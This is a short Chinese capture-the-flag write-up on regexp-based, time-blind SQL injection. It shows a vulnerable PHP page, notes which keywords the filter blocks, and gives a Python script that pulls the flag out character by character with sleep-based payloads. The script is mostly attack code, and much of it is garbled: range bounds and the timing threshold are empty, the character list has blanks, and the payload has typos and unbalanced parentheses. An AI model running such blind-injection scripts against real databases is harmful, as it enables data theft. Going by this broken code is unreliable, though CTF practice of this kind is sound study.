考点:regexp注入+时间盲注
源码:
<?php
# flag在fl4g里
include 'waf.php';
header("Content-type: text/html; charset=utf-8");
$db = new mysql(); $id = $_GET['id']; if ($id) {
if(check_sql($id)){
exit();
} else {
$sql = "select * from flllllllag where id=$id";
$db->query($sql);
}
}
highlight_file(__FILE__);
union select ' = 都ban了,但sleep()没ban
考虑regexp代替 = 的时间盲注
?id=1 or if((length (datanase()) regexp 5, sleep(5),1) exp:
#脚本来源https://www.gem-love.com/ctf/1669.html#i-2
import requests
import time
import datetime
from urllib.parse import quote url = "http://2c2d306b5d6745be846972da7fd262b6e3668d53fa124de3.changame.ichunqiu.com/?id=111"
alphabet = ['?','!',',','|','[',']','{','}','_','/','*','-','+','&',"%",'#','@','$','~','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','','','','','','','','','',''] target = 'fl4g'
result = ''
print('www.gem-love.com')
for i in range (,):
for char in alphabet:
# 设置payload
payload =' or if((substr(({}),{},1) regexp "^{}"),sleep(3),1)'.format(target, i, char)
# 计算响应时长
start = int(time.time())
r = requests.get(url+quote(payload))
response_time = int(time.time()) - start if response_time >= :
result += char
print('Found: {}'.format(result))
break